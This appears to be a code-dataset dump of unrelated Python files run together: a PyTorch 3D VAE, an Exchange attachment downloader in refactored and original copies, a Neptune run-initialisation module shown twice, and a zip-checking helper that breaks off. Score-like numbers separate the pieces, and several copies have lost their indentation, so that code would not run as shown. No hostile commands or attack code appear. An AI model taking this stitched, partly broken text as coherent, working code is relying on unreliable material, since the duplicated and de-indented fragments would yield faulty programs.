# input_w = input_size[2]
# Encoder
encoder_layers = []
# Input Layer
encoder_layers.append(EncoderLayer3D(input_c, first_layer_channels))
# Conv Layers
for i in range(n_conv - 1):
encoder_layers.append(
EncoderLayer3D(
first_layer_channels * 2**i, first_layer_channels * 2 ** (i + 1)
)
)
encoder_layers.append(
nn.Sequential(
nn.Conv3d(
first_layer_channels * 2 ** (n_conv - 1),
feature_channels,
4,
stride=2,
padding=1,
bias=False,
),
nn.ReLU(),
)
)
encoder = nn.Sequential(*encoder_layers)
# Latent space
mu_layer = nn.Conv3d(
feature_channels, latent_channels, 3, stride=1, padding=1, bias=False
)
var_layer = nn.Conv3d(
feature_channels, latent_channels, 3, stride=1, padding=1, bias=False
)
# Decoder
decoder_layers = []
decoder_layers.append(
nn.Sequential(
nn.ConvTranspose3d(
latent_channels,
feature_channels,
3,
stride=1,
padding=1,
bias=False,
),
nn.ReLU(),
nn.ConvTranspose3d(
feature_channels,
last_layer_channels * 2 ** (n_conv - 1),
4,
stride=2,
padding=1,
output_padding=[0, 1, 1],
bias=False,
),
nn.ReLU(),
)
)
for i in range(n_conv - 1, 0, -1):
decoder_layers.append(
DecoderLayer3D(
last_layer_channels * 2 ** (i),
last_layer_channels * 2 ** (i - 1),
output_padding=decoder_output_padding[-i],
)
)
decoder_layers.append(
nn.Sequential(
nn.ConvTranspose3d(
last_layer_channels,
input_c,
4,
stride=2,
padding=1,
output_padding=[1, 0, 1],
bias=False,
),
nn.Sigmoid(),
)
)
decoder = nn.Sequential(*decoder_layers)
super(Vanilla3DVAE, self).__init__(
encoder,
decoder,
mu_layer,
var_layer,
latent_space_size,
gpu=gpu,
recons_weight=recons_weight,
KL_weight=KL_weight,
is_3D=False,
)
class Vanilla3DdenseVAE(BaseVAE):
def __init__(
self,
input_size,
latent_space_size=256,
feature_size=1024,
n_conv=4,
io_layer_channels=8,
recons_weight=1,
KL_weight=1,
gpu=True,
):
first_layer_channels = io_layer_channels
last_layer_channels = io_layer_channels
# automatically compute padding
decoder_output_padding = [
# [1, 0, 0],
# [0, 0, 0],
# [0, 0, 1],
]
input_c = input_size[0]
input_d = input_size[1]
input_h = input_size[2]
input_w = input_size[3]
d, h, w = input_d, input_h, input_w
# ENCODER
encoder_layers = []
# Input Layer
encoder_layers.append(EncoderLayer3D(input_c, first_layer_channels))
decoder_output_padding.append([d % 2, h % 2, w % 2])
d, h, w = d // 2, h // 2, w // 2
# Conv Layers
for i in range(n_conv - 1):
encoder_layers.append(
EncoderLayer3D(
first_layer_channels * 2**i, first_layer_channels * 2 ** (i + 1)
)
)
# Construct output paddings
decoder_output_padding.append([d % 2, h % 2, w % 2])
d, h, w = d // 2, h // 2, w // 2
n_pix = (
first_layer_channels
* 2 ** (n_conv - 1)
* (input_d // (2**n_conv))
* (input_h // (2**n_conv))
* (input_w // (2**n_conv))
)
# Flatten
encoder_layers.append(Flatten())
# Intermediate feature space
if feature_size == 0:
feature_space = n_pix
else:
feature_space = feature_size
encoder_layers.append(
nn.Sequential(nn.Linear(n_pix, feature_space), nn.ReLU())
)
encoder = nn.Sequential(*encoder_layers)
# LATENT SPACE
mu_layer = nn.Linear(feature_space, latent_space_size)
var_layer = nn.Linear(feature_space, latent_space_size)
# DECODER
decoder_layers = []
# Intermediate feature space
if feature_size == 0:
decoder_layers.append(
nn.Sequential(
nn.Linear(latent_space_size, n_pix),
nn.ReLU(),
)
)
else:
decoder_layers.append(
nn.Sequential(
nn.Linear(latent_space_size, feature_size),
nn.ReLU(),
nn.Linear(feature_size, n_pix),
nn.ReLU(),
)
)
# Unflatten
decoder_layers.append(
Unflatten3D(
last_layer_channels * 2 ** (n_conv - 1),
input_d // (2**n_conv),
input_h // (2**n_conv),
input_w // (2**n_conv),
)
)
# Decoder layers
for i in range(n_conv - 1, 0, -1):
decoder_layers.append(
DecoderLayer3D(
last_layer_channels * 2 ** (i),
last_layer_channels * 2 ** (i - 1),
output_padding=decoder_output_padding[i],
)
)
# Output layer
decoder_layers.append(
nn.Sequential(
nn.ConvTranspose3d(
last_layer_channels,
input_c,
4,
stride=2,
padding=1,
output_padding=decoder_output_padding[0],
bias=False,
),
nn.Sigmoid(),
)
)
decoder = nn.Sequential(*decoder_layers)
super(Vanilla3DdenseVAE, self).__init__(
encoder,
decoder,
mu_layer,
var_layer,
latent_space_size,
gpu=gpu,
is_3D=False,
recons_weight=recons_weight,
KL_weight=KL_weight,
) | 0.8758 | 0.382141 |
import os
import errno
from datetime import datetime, timedelta
from getpass import getpass
import pytz
from exchangelib import (
DELEGATE, Account, Configuration, EWSDateTime, FileAttachment,
ItemAttachment, Message, ServiceAccount
)
from config import (
ALLOWED_EXTENSIONS, DOWNLOAD_ATTACHED_EMAILS,
DOWNLOAD_ROOT_PATH, OUTGOING_SERVER, RANGE_IN_SECONDS,
TIMEZONE
)
# Allowed attachment extensions, parsed once from the comma-separated config
# value (e.g. "pdf, docx" -> ["pdf", "docx"]). The previous version wrapped
# this in a redundant pass-through comprehension.
PARSED_EXTENSIONS = [ext.strip() for ext in ALLOWED_EXTENSIONS.split(",")]
def get_user_login():
    """Prompt on the console for username, optional email and password.

    Username and password are re-prompted until non-empty; email may be
    blank when the username itself is an email address.
    """
    username = ""
    while not username:
        username = input("Enter username: ")
    email = input("Enter email (optional if username is email): ")
    password = ""
    while not password:
        password = getpass("Enter password: ")
    return (username.strip(), email.strip(), password)
def login(username, email, password):
    """Log in to the MS Exchange server and return the Account.

    Falls back to *username* as the SMTP address when *email* is empty.
    """
    print("Logging in...")
    # ServiceAccount gives fault-tolerant (retrying) credentials.
    credentials = ServiceAccount(username=username, password=password)
    config = Configuration(server=OUTGOING_SERVER, credentials=credentials)
    smtp_address = email if email else username
    account = Account(
        primary_smtp_address=smtp_address,
        autodiscover=False,
        config=config,
        access_type=DELEGATE,
    )
    print("Login successful.")
    return account
def check_directories(path):
    """Ensure the parent directory of *path* exists, creating it if needed.

    :param path: file path whose parent directories should exist
    """
    directory = os.path.dirname(path)
    # Guard: a bare filename has no parent directory; the old code called
    # os.makedirs('') in that case and raised FileNotFoundError.
    if directory:
        # exist_ok=True avoids the check-then-create race the previous
        # errno.EEXIST dance worked around.
        os.makedirs(directory, exist_ok=True)
def is_valid_extension(filename):
    """True when *filename*'s extension is in the configured allow-list.

    A name without a dot is compared whole against the list, matching the
    behaviour of ``split('.')[-1]``.
    """
    extension = filename.rsplit(".", 1)[-1]
    return extension in PARSED_EXTENSIONS
def get_attachments(inbox):
    """Download recent attachments (and optionally attached emails) to disk.

    :param inbox: exchangelib folder to scan (e.g. ``account.inbox``)
    """
    start_date = datetime.now() - timedelta(seconds=RANGE_IN_SECONDS)
    # Roll forward one day with timedelta so month/year boundaries are safe:
    # the old ``EWSDateTime(year, month, date + 1)`` raised ValueError on the
    # last day of a month.
    next_day = start_date + timedelta(days=1)
    ews_start_date = pytz.timezone(TIMEZONE).localize(
        EWSDateTime(next_day.year, next_day.month, next_day.day)
    )
    print("Retrieving attachments from {0}...".format(ews_start_date))
    qs = inbox.filter(datetime_received__gte=ews_start_date)
    # Bug fix: iterate the filtered queryset. The old code built ``qs`` and
    # then scanned ``inbox.all()``, downloading from the entire mailbox.
    for item in qs:
        formatted_datetime = datetime.strftime(item.datetime_received, "%Y-%m-%d-%H-%M-%S")
        for attachment in item.attachments:
            if isinstance(attachment, FileAttachment) and is_valid_extension(attachment.name):
                local_path = os.path.join(DOWNLOAD_ROOT_PATH, formatted_datetime, attachment.name)
                check_directories(local_path)
                with open(local_path, 'wb') as f:
                    f.write(attachment.content)
                print("Saved attachment to {0}".format(local_path))
            elif isinstance(attachment, ItemAttachment) and DOWNLOAD_ATTACHED_EMAILS:
                if isinstance(attachment.item, Message):
                    local_path = os.path.join(DOWNLOAD_ROOT_PATH, formatted_datetime, attachment.item.subject)
                    check_directories(local_path)
                    # NOTE(review): Message.body may be str in exchangelib,
                    # which 'wb' cannot write — confirm against the installed
                    # exchangelib version.
                    with open(local_path, 'wb') as f:
                        f.write(attachment.item.body)
                    print("Saved email to {0}".format(local_path))
            else:
                print("Skipping..")
def run():
    """Prompt for credentials, log in, and download recent inbox attachments."""
    username, email, password = get_user_login()
    account = login(username, email, password)
    get_attachments(account.inbox)
if __name__ == "__main__":
run() | crawler.py | import os
import errno
from datetime import datetime, timedelta
from getpass import getpass
import pytz
from exchangelib import (
DELEGATE, Account, Configuration, EWSDateTime, FileAttachment,
ItemAttachment, Message, ServiceAccount
)
from config import (
ALLOWED_EXTENSIONS, DOWNLOAD_ATTACHED_EMAILS,
DOWNLOAD_ROOT_PATH, OUTGOING_SERVER, RANGE_IN_SECONDS,
TIMEZONE
)
PARSED_EXTENSIONS = [ext for ext in (x.strip() for x in ALLOWED_EXTENSIONS.split(","))]
def get_user_login():
"""Get user login credentials"""
# User login
username, password = ("", "")
while username == "":
username = input("Enter username: ")
email = input("Enter email (optional if username is email): ")
while password == "":
password = getpass("Enter password: ")
return (username.strip(), email.strip(), password)
def login(username, email, password):
"""Login to MS Exchange account"""
print("Logging in...")
# Construct login credentials with fault tolerant ServiceAccount
credentials = ServiceAccount(username=username, password=password)
config = Configuration(server=OUTGOING_SERVER, credentials=credentials)
# Retrieve account
account = Account(
primary_smtp_address=email if bool(email) else username,
autodiscover=False,
config=config,
access_type=DELEGATE
)
print("Login successful.")
return account
def check_directories(path):
"""Checks if directories exist along path and create accordingly"""
if not os.path.exists(os.path.dirname(path)):
try:
os.makedirs(os.path.dirname(path))
except OSError as exc: # Guard against race condition
if exc.errno != errno.EEXIST:
raise
def is_valid_extension(filename):
"""Checks if file is of correct extension"""
ext = filename.split(".")[-1]
return ext in PARSED_EXTENSIONS
def get_attachments(inbox):
"""Downloads all attachments to host machine"""
start_date = datetime.now() - timedelta(seconds=RANGE_IN_SECONDS)
year, month, date = (start_date.year, start_date.month, start_date.day)
ews_start_date = pytz.timezone(TIMEZONE).localize(EWSDateTime(year, month, date + 1))
print("Retrieving attachments from {0}...".format(ews_start_date))
qs = inbox.filter(datetime_received__gte=ews_start_date)
for item in inbox.all():
formatted_datetime = datetime.strftime(item.datetime_received, "%Y-%m-%d-%H-%M-%S")
for attachment in item.attachments:
if isinstance(attachment, FileAttachment) and is_valid_extension(attachment.name):
local_path = os.path.join(DOWNLOAD_ROOT_PATH, formatted_datetime, attachment.name)
check_directories(local_path)
with open(local_path, 'wb') as f:
f.write(attachment.content)
print("Saved attachment to {0}".format(local_path))
elif isinstance(attachment, ItemAttachment) and DOWNLOAD_ATTACHED_EMAILS:
if isinstance(attachment.item, Message):
local_path = os.path.join(DOWNLOAD_ROOT_PATH, formatted_datetime, attachment.item.subject)
check_directories(local_path)
with open(local_path, 'wb') as f:
f.write(attachment.item.body)
print("Saved email to {0}".format(local_path))
else:
print("Skipping..")
def run():
"""Executes script"""
username, email, password = get_user_login()
account = login(username, email, password)
inbox = account.inbox
get_attachments(inbox)
if __name__ == "__main__":
run() | 0.319121 | 0.096578 |
import logging
import os
import re
import uuid
from datetime import datetime
from pathlib import Path
from platform import node as get_hostname
from typing import List, Optional, Union
import click
from neptune.new.attributes import constants as attr_consts
from neptune.new.constants import (
ASYNC_DIRECTORY,
NEPTUNE_RUNS_DIRECTORY,
OFFLINE_DIRECTORY,
)
from neptune.new.envs import CUSTOM_RUN_ID_ENV_NAME, NEPTUNE_NOTEBOOK_ID, NEPTUNE_NOTEBOOK_PATH, PROJECT_ENV_NAME
from neptune.new.exceptions import (NeptuneIncorrectProjectNameException, NeptuneMissingProjectNameException,
NeptuneRunResumeAndCustomIdCollision)
from neptune.new.internal.backends.hosted_neptune_backend import HostedNeptuneBackend
from neptune.new.internal.backends.neptune_backend import NeptuneBackend
from neptune.new.internal.backends.neptune_backend_mock import NeptuneBackendMock
from neptune.new.internal.backends.offline_neptune_backend import OfflineNeptuneBackend
from neptune.new.internal.backgroud_job_list import BackgroundJobList
from neptune.new.internal.containers.disk_queue import DiskQueue
from neptune.new.internal.credentials import Credentials
from neptune.new.internal.hardware.hardware_metric_reporting_job import HardwareMetricReportingJob
from neptune.new.internal.notebooks.notebooks import create_checkpoint
from neptune.new.internal.operation import Operation
from neptune.new.internal.operation_processors.async_operation_processor import AsyncOperationProcessor
from neptune.new.internal.operation_processors.offline_operation_processor import OfflineOperationProcessor
from neptune.new.internal.operation_processors.sync_operation_processor import SyncOperationProcessor
from neptune.new.internal.streams.std_capture_background_job import (
StderrCaptureBackgroundJob,
StdoutCaptureBackgroundJob,
)
from neptune.new.internal.utils import verify_collection_type, verify_type
from neptune.new.internal.utils.git import discover_git_repo_location, get_git_info
from neptune.new.internal.utils.ping_background_job import PingBackgroundJob
from neptune.new.internal.utils.source_code import upload_source_code
from neptune.new.run import Run
from neptune.new.types.series.string_series import StringSeries
from neptune.new.version import version as parsed_version
from neptune.patterns import PROJECT_QUALIFIED_NAME_PATTERN
__version__ = str(parsed_version)
_logger = logging.getLogger(__name__)
OFFLINE = "offline"
DEBUG = "debug"
ASYNC = "async"
SYNC = "sync"
def init(project: Optional[str] = None,
         api_token: Optional[str] = None,
         run: Optional[str] = None,
         custom_run_id: Optional[str] = None,
         mode: str = ASYNC,
         name: Optional[str] = None,
         description: Optional[str] = None,
         tags: Optional[Union[List[str], str]] = None,
         source_files: Optional[Union[List[str], str]] = None,
         capture_stdout: bool = True,
         capture_stderr: bool = True,
         capture_hardware_metrics: bool = True,
         monitoring_namespace: str = "monitoring",
         flush_period: float = 5,
         proxies: dict = None) -> Run:
    """Create a new Neptune run (or resume *run*) and return its handle.

    Builds the backend for *mode* ("async", "sync", "offline" or "debug"),
    resolves the target project, creates or fetches the run, wires up the
    operation processor and monitoring background jobs, and populates the
    system attributes (name, description, hostname, tags).

    Raises:
        NeptuneRunResumeAndCustomIdCollision: when both *run* and
            *custom_run_id* are given.
        NeptuneMissingProjectNameException: when no project is resolvable.
        NeptuneIncorrectProjectNameException: when the project name is
            malformed.
        ValueError: for an unknown *mode*.
    """
    # --- argument validation -------------------------------------------
    verify_type("project", project, (str, type(None)))
    verify_type("api_token", api_token, (str, type(None)))
    verify_type("run", run, (str, type(None)))
    verify_type("custom_run_id", custom_run_id, (str, type(None)))
    verify_type("mode", mode, str)
    verify_type("name", name, (str, type(None)))
    verify_type("description", description, (str, type(None)))
    verify_type("capture_stdout", capture_stdout, bool)
    verify_type("capture_stderr", capture_stderr, bool)
    verify_type("capture_hardware_metrics", capture_hardware_metrics, bool)
    verify_type("monitoring_namespace", monitoring_namespace, str)
    verify_type("flush_period", flush_period, (int, float))
    verify_type("proxies", proxies, (dict, type(None)))
    if tags is not None:
        if isinstance(tags, str):
            tags = [tags]  # allow a single tag as a bare string
        else:
            verify_collection_type("tags", tags, str)
    if source_files is not None:
        if isinstance(source_files, str):
            source_files = [source_files]
        else:
            verify_collection_type("source_files", source_files, str)
    # Defaults apply only to fresh runs; resumed runs keep stored values.
    name = "Untitled" if run is None and name is None else name
    description = "" if run is None and description is None else description
    hostname = get_hostname() if run is None else None
    custom_run_id = custom_run_id or os.getenv(CUSTOM_RUN_ID_ENV_NAME)
    if run and custom_run_id:
        raise NeptuneRunResumeAndCustomIdCollision()
    # --- backend selection ---------------------------------------------
    if mode == ASYNC:
        # TODO Initialize backend in async thread
        backend = HostedNeptuneBackend(
            credentials=Credentials(api_token=api_token),
            proxies=proxies)
    elif mode == SYNC:
        backend = HostedNeptuneBackend(
            credentials=Credentials(api_token=api_token),
            proxies=proxies)
    elif mode == DEBUG:
        backend = NeptuneBackendMock()
    elif mode == OFFLINE:
        backend = OfflineNeptuneBackend()
    else:
        raise ValueError('mode should be one of ["async", "sync", "offline", "debug"]')
    # --- project resolution --------------------------------------------
    if mode == OFFLINE or mode == DEBUG:
        project = 'offline/project-placeholder'
    elif not project:
        project = os.getenv(PROJECT_ENV_NAME)
        if not project:
            raise NeptuneMissingProjectNameException()
    if not re.match(PROJECT_QUALIFIED_NAME_PATTERN, project):
        raise NeptuneIncorrectProjectNameException(project)
    project_obj = backend.get_project(project)
    # --- run creation / resumption -------------------------------------
    if run:
        api_run = backend.get_run(project + '/' + run)
    else:
        git_ref = get_git_info(discover_git_repo_location())
        if custom_run_id and len(custom_run_id) > 32:
            _logger.warning('Given custom_run_id exceeds 32 characters and it will be ignored.')
            custom_run_id = None
        notebook_id, checkpoint_id = _create_notebook_checkpoint(backend)
        api_run = backend.create_run(project_obj.uuid, git_ref, custom_run_id, notebook_id, checkpoint_id)
    # --- operation processor -------------------------------------------
    if mode == ASYNC:
        run_path = "{}/{}/{}".format(NEPTUNE_RUNS_DIRECTORY, ASYNC_DIRECTORY, api_run.uuid)
        try:
            execution_id = len(os.listdir(run_path))  # next execution index
        except FileNotFoundError:
            execution_id = 0
        execution_path = "{}/exec-{}-{}".format(run_path, execution_id, datetime.now())
        # Make the timestamped directory name filesystem-safe.
        execution_path = execution_path.replace(" ", "_").replace(":", ".")
        operation_processor = AsyncOperationProcessor(
            api_run.uuid,
            DiskQueue(Path(execution_path), lambda x: x.to_dict(), Operation.from_dict),
            backend,
            sleep_time=flush_period)
    elif mode == SYNC:
        operation_processor = SyncOperationProcessor(api_run.uuid, backend)
    elif mode == DEBUG:
        operation_processor = SyncOperationProcessor(api_run.uuid, backend)
    elif mode == OFFLINE:
        # Run was returned by mocked backend and has some random UUID.
        run_path = "{}/{}/{}".format(NEPTUNE_RUNS_DIRECTORY, OFFLINE_DIRECTORY, api_run.uuid)
        storage_queue = DiskQueue(Path(run_path),
                                  lambda x: x.to_dict(),
                                  Operation.from_dict)
        operation_processor = OfflineOperationProcessor(storage_queue)
    else:
        # BUG FIX: error message read "on of" instead of "one of".
        raise ValueError('mode should be one of ["async", "sync", "offline", "debug"]')
    # --- monitoring background jobs -------------------------------------
    stdout_path = "{}/stdout".format(monitoring_namespace)
    stderr_path = "{}/stderr".format(monitoring_namespace)
    background_jobs = []
    if capture_stdout:
        background_jobs.append(StdoutCaptureBackgroundJob(attribute_name=stdout_path))
    if capture_stderr:
        background_jobs.append(StderrCaptureBackgroundJob(attribute_name=stderr_path))
    if capture_hardware_metrics:
        background_jobs.append(HardwareMetricReportingJob(attribute_namespace=monitoring_namespace))
    background_jobs.append(PingBackgroundJob())
    # --- run handle and system attributes -------------------------------
    _run = Run(api_run.uuid, backend, operation_processor, BackgroundJobList(background_jobs))
    if mode != OFFLINE:
        _run.sync(wait=False)
    if name is not None:
        _run[attr_consts.SYSTEM_NAME_ATTRIBUTE_PATH] = name
    if description is not None:
        _run[attr_consts.SYSTEM_DESCRIPTION_ATTRIBUTE_PATH] = description
    if hostname is not None:
        _run[attr_consts.SYSTEM_HOSTNAME_ATTRIBUTE_PATH] = hostname
    if tags is not None:
        _run[attr_consts.SYSTEM_TAGS_ATTRIBUTE_PATH].add(tags)
    if capture_stdout and not _run.exists(stdout_path):
        _run.define(stdout_path, StringSeries([]))
    if capture_stderr and not _run.exists(stderr_path):
        _run.define(stderr_path, StringSeries([]))
    upload_source_code(source_files=source_files, run=_run)
    _run.start()
    # Echo where the run can be found.
    if mode == OFFLINE:
        click.echo("offline/{}".format(api_run.uuid))
    elif mode != DEBUG:
        click.echo("{base_url}/{workspace}/{project}/e/{run_id}".format(
            base_url=backend.get_display_address(),
            workspace=api_run.workspace,
            project=api_run.project_name,
            run_id=api_run.short_id
        ))
    return _run
def _create_notebook_checkpoint(backend: NeptuneBackend) -> (uuid.UUID, uuid.UUID):
    """Resolve notebook and checkpoint ids from the environment.

    Returns ``(notebook_id, checkpoint_id)``; either may be None when the
    corresponding environment variable is missing or invalid.
    """
    notebook_id = None
    if os.getenv(NEPTUNE_NOTEBOOK_ID, None) is not None:
        try:
            notebook_id = uuid.UUID(os.environ[NEPTUNE_NOTEBOOK_ID])
        except ValueError:
            _logger.warning("Invalid notebook ID, must be an UUID")
    has_path = os.getenv(NEPTUNE_NOTEBOOK_PATH, None) is not None
    notebook_path = os.environ[NEPTUNE_NOTEBOOK_PATH] if has_path else None
    # A checkpoint only makes sense when both pieces are present.
    checkpoint_id = None
    if notebook_id is not None and notebook_path is not None:
        checkpoint_id = create_checkpoint(
            backend=backend, notebook_id=notebook_id, notebook_path=notebook_path)
    return notebook_id, checkpoint_id
import os
import re
import uuid
from datetime import datetime
from pathlib import Path
from platform import node as get_hostname
from typing import List, Optional, Union
import click
from neptune.new.attributes import constants as attr_consts
from neptune.new.constants import (
ASYNC_DIRECTORY,
NEPTUNE_RUNS_DIRECTORY,
OFFLINE_DIRECTORY,
)
from neptune.new.envs import CUSTOM_RUN_ID_ENV_NAME, NEPTUNE_NOTEBOOK_ID, NEPTUNE_NOTEBOOK_PATH, PROJECT_ENV_NAME
from neptune.new.exceptions import (NeptuneIncorrectProjectNameException, NeptuneMissingProjectNameException,
NeptuneRunResumeAndCustomIdCollision)
from neptune.new.internal.backends.hosted_neptune_backend import HostedNeptuneBackend
from neptune.new.internal.backends.neptune_backend import NeptuneBackend
from neptune.new.internal.backends.neptune_backend_mock import NeptuneBackendMock
from neptune.new.internal.backends.offline_neptune_backend import OfflineNeptuneBackend
from neptune.new.internal.backgroud_job_list import BackgroundJobList
from neptune.new.internal.containers.disk_queue import DiskQueue
from neptune.new.internal.credentials import Credentials
from neptune.new.internal.hardware.hardware_metric_reporting_job import HardwareMetricReportingJob
from neptune.new.internal.notebooks.notebooks import create_checkpoint
from neptune.new.internal.operation import Operation
from neptune.new.internal.operation_processors.async_operation_processor import AsyncOperationProcessor
from neptune.new.internal.operation_processors.offline_operation_processor import OfflineOperationProcessor
from neptune.new.internal.operation_processors.sync_operation_processor import SyncOperationProcessor
from neptune.new.internal.streams.std_capture_background_job import (
StderrCaptureBackgroundJob,
StdoutCaptureBackgroundJob,
)
from neptune.new.internal.utils import verify_collection_type, verify_type
from neptune.new.internal.utils.git import discover_git_repo_location, get_git_info
from neptune.new.internal.utils.ping_background_job import PingBackgroundJob
from neptune.new.internal.utils.source_code import upload_source_code
from neptune.new.run import Run
from neptune.new.types.series.string_series import StringSeries
from neptune.new.version import version as parsed_version
from neptune.patterns import PROJECT_QUALIFIED_NAME_PATTERN
__version__ = str(parsed_version)
_logger = logging.getLogger(__name__)
OFFLINE = "offline"
DEBUG = "debug"
ASYNC = "async"
SYNC = "sync"
def init(project: Optional[str] = None,
         api_token: Optional[str] = None,
         run: Optional[str] = None,
         custom_run_id: Optional[str] = None,
         mode: str = ASYNC,
         name: Optional[str] = None,
         description: Optional[str] = None,
         tags: Optional[Union[List[str], str]] = None,
         source_files: Optional[Union[List[str], str]] = None,
         capture_stdout: bool = True,
         capture_stderr: bool = True,
         capture_hardware_metrics: bool = True,
         monitoring_namespace: str = "monitoring",
         flush_period: float = 5,
         proxies: dict = None) -> Run:
    """Create a new Neptune run (or resume *run*) and return its handle.

    Builds the backend for *mode* ("async", "sync", "offline" or "debug"),
    resolves the target project, creates or fetches the run, wires up the
    operation processor and monitoring background jobs, and populates the
    system attributes (name, description, hostname, tags).

    Raises:
        NeptuneRunResumeAndCustomIdCollision: when both *run* and
            *custom_run_id* are given.
        NeptuneMissingProjectNameException: when no project is resolvable.
        NeptuneIncorrectProjectNameException: when the project name is
            malformed.
        ValueError: for an unknown *mode*.
    """
    # --- argument validation -------------------------------------------
    verify_type("project", project, (str, type(None)))
    verify_type("api_token", api_token, (str, type(None)))
    verify_type("run", run, (str, type(None)))
    verify_type("custom_run_id", custom_run_id, (str, type(None)))
    verify_type("mode", mode, str)
    verify_type("name", name, (str, type(None)))
    verify_type("description", description, (str, type(None)))
    verify_type("capture_stdout", capture_stdout, bool)
    verify_type("capture_stderr", capture_stderr, bool)
    verify_type("capture_hardware_metrics", capture_hardware_metrics, bool)
    verify_type("monitoring_namespace", monitoring_namespace, str)
    verify_type("flush_period", flush_period, (int, float))
    verify_type("proxies", proxies, (dict, type(None)))
    if tags is not None:
        if isinstance(tags, str):
            tags = [tags]  # allow a single tag as a bare string
        else:
            verify_collection_type("tags", tags, str)
    if source_files is not None:
        if isinstance(source_files, str):
            source_files = [source_files]
        else:
            verify_collection_type("source_files", source_files, str)
    # Defaults apply only to fresh runs; resumed runs keep stored values.
    name = "Untitled" if run is None and name is None else name
    description = "" if run is None and description is None else description
    hostname = get_hostname() if run is None else None
    custom_run_id = custom_run_id or os.getenv(CUSTOM_RUN_ID_ENV_NAME)
    if run and custom_run_id:
        raise NeptuneRunResumeAndCustomIdCollision()
    # --- backend selection ---------------------------------------------
    if mode == ASYNC:
        # TODO Initialize backend in async thread
        backend = HostedNeptuneBackend(
            credentials=Credentials(api_token=api_token),
            proxies=proxies)
    elif mode == SYNC:
        backend = HostedNeptuneBackend(
            credentials=Credentials(api_token=api_token),
            proxies=proxies)
    elif mode == DEBUG:
        backend = NeptuneBackendMock()
    elif mode == OFFLINE:
        backend = OfflineNeptuneBackend()
    else:
        raise ValueError('mode should be one of ["async", "sync", "offline", "debug"]')
    # --- project resolution --------------------------------------------
    if mode == OFFLINE or mode == DEBUG:
        project = 'offline/project-placeholder'
    elif not project:
        project = os.getenv(PROJECT_ENV_NAME)
        if not project:
            raise NeptuneMissingProjectNameException()
    if not re.match(PROJECT_QUALIFIED_NAME_PATTERN, project):
        raise NeptuneIncorrectProjectNameException(project)
    project_obj = backend.get_project(project)
    # --- run creation / resumption -------------------------------------
    if run:
        api_run = backend.get_run(project + '/' + run)
    else:
        git_ref = get_git_info(discover_git_repo_location())
        if custom_run_id and len(custom_run_id) > 32:
            _logger.warning('Given custom_run_id exceeds 32 characters and it will be ignored.')
            custom_run_id = None
        notebook_id, checkpoint_id = _create_notebook_checkpoint(backend)
        api_run = backend.create_run(project_obj.uuid, git_ref, custom_run_id, notebook_id, checkpoint_id)
    # --- operation processor -------------------------------------------
    if mode == ASYNC:
        run_path = "{}/{}/{}".format(NEPTUNE_RUNS_DIRECTORY, ASYNC_DIRECTORY, api_run.uuid)
        try:
            execution_id = len(os.listdir(run_path))  # next execution index
        except FileNotFoundError:
            execution_id = 0
        execution_path = "{}/exec-{}-{}".format(run_path, execution_id, datetime.now())
        # Make the timestamped directory name filesystem-safe.
        execution_path = execution_path.replace(" ", "_").replace(":", ".")
        operation_processor = AsyncOperationProcessor(
            api_run.uuid,
            DiskQueue(Path(execution_path), lambda x: x.to_dict(), Operation.from_dict),
            backend,
            sleep_time=flush_period)
    elif mode == SYNC:
        operation_processor = SyncOperationProcessor(api_run.uuid, backend)
    elif mode == DEBUG:
        operation_processor = SyncOperationProcessor(api_run.uuid, backend)
    elif mode == OFFLINE:
        # Run was returned by mocked backend and has some random UUID.
        run_path = "{}/{}/{}".format(NEPTUNE_RUNS_DIRECTORY, OFFLINE_DIRECTORY, api_run.uuid)
        storage_queue = DiskQueue(Path(run_path),
                                  lambda x: x.to_dict(),
                                  Operation.from_dict)
        operation_processor = OfflineOperationProcessor(storage_queue)
    else:
        # BUG FIX: error message read "on of" instead of "one of".
        raise ValueError('mode should be one of ["async", "sync", "offline", "debug"]')
    # --- monitoring background jobs -------------------------------------
    stdout_path = "{}/stdout".format(monitoring_namespace)
    stderr_path = "{}/stderr".format(monitoring_namespace)
    background_jobs = []
    if capture_stdout:
        background_jobs.append(StdoutCaptureBackgroundJob(attribute_name=stdout_path))
    if capture_stderr:
        background_jobs.append(StderrCaptureBackgroundJob(attribute_name=stderr_path))
    if capture_hardware_metrics:
        background_jobs.append(HardwareMetricReportingJob(attribute_namespace=monitoring_namespace))
    background_jobs.append(PingBackgroundJob())
    # --- run handle and system attributes -------------------------------
    _run = Run(api_run.uuid, backend, operation_processor, BackgroundJobList(background_jobs))
    if mode != OFFLINE:
        _run.sync(wait=False)
    if name is not None:
        _run[attr_consts.SYSTEM_NAME_ATTRIBUTE_PATH] = name
    if description is not None:
        _run[attr_consts.SYSTEM_DESCRIPTION_ATTRIBUTE_PATH] = description
    if hostname is not None:
        _run[attr_consts.SYSTEM_HOSTNAME_ATTRIBUTE_PATH] = hostname
    if tags is not None:
        _run[attr_consts.SYSTEM_TAGS_ATTRIBUTE_PATH].add(tags)
    if capture_stdout and not _run.exists(stdout_path):
        _run.define(stdout_path, StringSeries([]))
    if capture_stderr and not _run.exists(stderr_path):
        _run.define(stderr_path, StringSeries([]))
    upload_source_code(source_files=source_files, run=_run)
    _run.start()
    # Echo where the run can be found.
    if mode == OFFLINE:
        click.echo("offline/{}".format(api_run.uuid))
    elif mode != DEBUG:
        click.echo("{base_url}/{workspace}/{project}/e/{run_id}".format(
            base_url=backend.get_display_address(),
            workspace=api_run.workspace,
            project=api_run.project_name,
            run_id=api_run.short_id
        ))
    return _run
def _create_notebook_checkpoint(backend: NeptuneBackend) -> (uuid.UUID, uuid.UUID):
    """Resolve notebook and checkpoint ids from the environment.

    Returns ``(notebook_id, checkpoint_id)``; either may be None when the
    corresponding environment variable is missing or invalid.
    """
    notebook_id = None
    if os.getenv(NEPTUNE_NOTEBOOK_ID, None) is not None:
        try:
            notebook_id = uuid.UUID(os.environ[NEPTUNE_NOTEBOOK_ID])
        except ValueError:
            _logger.warning("Invalid notebook ID, must be an UUID")
    has_path = os.getenv(NEPTUNE_NOTEBOOK_PATH, None) is not None
    notebook_path = os.environ[NEPTUNE_NOTEBOOK_PATH] if has_path else None
    # A checkpoint only makes sense when both pieces are present.
    checkpoint_id = None
    if notebook_id is not None and notebook_path is not None:
        checkpoint_id = create_checkpoint(
            backend=backend, notebook_id=notebook_id, notebook_path=notebook_path)
    return notebook_id, checkpoint_id
import os
import re
import zipfile
from typing import Optional
def is_zip(file_type) -> bool:
    """
    Check if the given file is a ZIP

    Args:
        file_type: MIME type string to test

    Returns:
        bool: Whether it's a ZIP file or not
    """
    mimes = {
        'application/zip',
        'application/octet-stream',
        'application/x-zip-compressed',
        'multipart/x-zip'
    }
